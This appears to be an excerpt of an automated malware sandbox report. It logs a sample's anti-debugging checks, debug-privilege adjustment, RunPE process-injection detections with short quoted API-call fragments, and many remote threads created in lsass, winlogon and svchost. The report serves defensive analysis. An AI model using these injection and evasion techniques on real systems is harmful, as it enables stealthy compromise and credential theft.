Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugFlags
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPort
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugObjectHandle
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugFlags
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPort
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugObjectHandle
Source: C:\Windows\System32\cmd.exeCode function: 17_2_00000253FC4084B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00000253FC4084B0
Source: C:\Windows\System32\cmd.exeCode function: 17_2_00000253FC401E3C LoadLibraryA,GetProcAddress,SleepEx,17_2_00000253FC401E3C
Source: C:\Windows\System32\cmd.exeCode function: 17_2_00000253FC40F440 GetProcessHeap,17_2_00000253FC40F440
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\dllhost.exeProcess token adjusted: Debug
Source: C:\Windows\System32\cmd.exeCode function: 17_2_00000253FC408814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_00000253FC408814
Source: C:\Windows\System32\cmd.exeCode function: 17_2_00000253FC4084B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00000253FC4084B0
Source: C:\Windows\System32\cmd.exeCode function: 17_2_00000253FC40CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00000253FC40CD80
Source: C:\Windows\System32\cmd.exeCode function: 17_2_00000253FC438814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_00000253FC438814
Source: C:\Windows\System32\cmd.exeCode function: 17_2_00000253FC4384B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00000253FC4384B0
Source: C:\Windows\System32\cmd.exeCode function: 17_2_00000253FC43CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00000253FC43CD80
Source: C:\Windows\System32\conhost.exeCode function: 18_2_000002A5AF36CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_000002A5AF36CD80
Source: C:\Windows\System32\conhost.exeCode function: 18_2_000002A5AF368814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_000002A5AF368814
Source: C:\Windows\System32\conhost.exeCode function: 18_2_000002A5AF3684B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_000002A5AF3684B0
Source: C:\Windows\System32\conhost.exeCode function: 37_2_000001780DD28814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,37_2_000001780DD28814
Source: C:\Windows\System32\conhost.exeCode function: 37_2_000001780DD2CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,37_2_000001780DD2CD80
Source: C:\Windows\System32\conhost.exeCode function: 37_2_000001780DD284B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,37_2_000001780DD284B0
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000020175EBCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,38_2_0000020175EBCD80
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000020175EB84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,38_2_0000020175EB84B0
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000020175EB8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,38_2_0000020175EB8814
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000020175EECD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,38_2_0000020175EECD80
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000020175EE84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,38_2_0000020175EE84B0
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000020175EE8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,38_2_0000020175EE8814
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_000002D0165E8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,39_2_000002D0165E8814
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_000002D0165E84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,39_2_000002D0165E84B0
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_000002D0165ECD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,39_2_000002D0165ECD80
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_000002D016618814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,39_2_000002D016618814
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_000002D0166184B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,39_2_000002D0166184B0
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_000002D01661CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,39_2_000002D01661CD80

HIPS / PFW / Operating System Protection Evasion

Source: 35.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs.Net Code: Run contains injection code
Source: 36.2.powershell.exe.1b4b4d149e8.12.raw.unpack, RunPE.cs.Net Code: Run contains injection code
Source: 36.2.powershell.exe.1b4bd200000.16.raw.unpack, RunPE.cs.Net Code: Run contains injection code
Source: 35.2.powershell.exe.4040b0.1.raw.unpack, Unhook.csReference to suspicious API methods: VirtualProtect((IntPtr)((long)moduleHandle + num5), (IntPtr)num6, 64u, out var oldProtect)
Source: 35.2.powershell.exe.4040b0.1.raw.unpack, RunPE.csReference to suspicious API methods: OpenProcess(128, inheritHandle: false, parentProcessId)
Source: 35.2.powershell.exe.4040b0.1.raw.unpack, RunPE.csReference to suspicious API methods: NtAllocateVirtualMemory(process, ref address, IntPtr.Zero, ref size2, 12288u, 64u)
Source: 35.2.powershell.exe.4040b0.1.raw.unpack, RunPE.csReference to suspicious API methods: NtWriteVirtualMemory(process, address, payload, num3, IntPtr.Zero)
Source: 35.2.powershell.exe.4040b0.1.raw.unpack, RunPE.csReference to suspicious API methods: NtSetContextThread(thread, intPtr5)
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000000140002434 CreateProcessW,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,OpenProcess,TerminateProcess,38_2_0000000140002434
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe EIP: 3000000
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\winlogon.exe EIP: 16582EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\lsass.exe EIP: F14E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 41FA2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\winlogon.exe EIP: 16582EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\lsass.exe EIP: F14E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 41FA2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\dwm.exe EIP: 5B042EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: F32B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 9FD62EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: CA6E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\dwm.exe EIP: 5B012EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: F32B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 9FD62EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: CA6E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: EDE62EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: ED7B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: A19B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 95FB2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: A1982EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 95FB2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 670F2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 4A4B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 19A42EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 670C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 4A4B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 19A42EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: D2662EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: D1FC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: BDCC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: BDC92EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: D9542EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: D2C72EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: D8FC2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: D2C72EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: CE6E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: CE6B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: AF662EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: AEFD2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: B6972EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A22A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 25AA2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1A2F2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 63952EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4ABA2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F03D2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AF3C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EBEB2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8E1B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A7DC2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C0F52EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D7C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 68FC2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EA802EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CE892EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D5BB2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DEB72EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C0462EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A2152EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8EB2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 60742EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 569B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8FE62EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3DC22EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 99B22EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 984F2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 81BB2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D2D92EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DE442EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1D0E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: B6942EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 86A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D1E52EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A22A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D2002EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 25AA2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 155B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1A2F2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 43E52EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 63952EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A6F82EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4ABA2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 68252EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F03D2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 452E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AF3C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 27D22EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EBEB2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E5BE2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8E1B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B07C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A7DC2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4F662EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AE502EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C0F52EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1B9F2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D7C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F3CD2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 68FC2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CF7C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EA802EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 43652EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CE892EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D5BB2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 39DF2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DEB72EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3CF25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C0462EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9662EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A2152EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 325C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8EB2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DEC32EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 60742EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 569B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C91C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8FE62EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3DC22EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 99B22EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 984F2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 81BB2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D2D92EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DE442EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1D0E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4725AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 86A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D1E52EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1C25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D2002EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13D25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 155B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 43E52EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BB25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A6F82EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 68252EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9725AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 452E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 27D22EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E5BE2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B07C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13F25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4F662EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AE502EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1B9F2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DA25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F3CD2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7625AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CF7C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12E25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 43652EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 39DF2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3CF25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9662EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7D25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 325C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DEC32EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C91C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5F25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7E25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4725AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6C25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1C25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13D25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13C25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BB25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6C25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FA25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9725AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CC25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EE25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11E25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13F25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12D25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10E25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DA25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7625AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12E25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7D25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3A25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5F25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12325AC
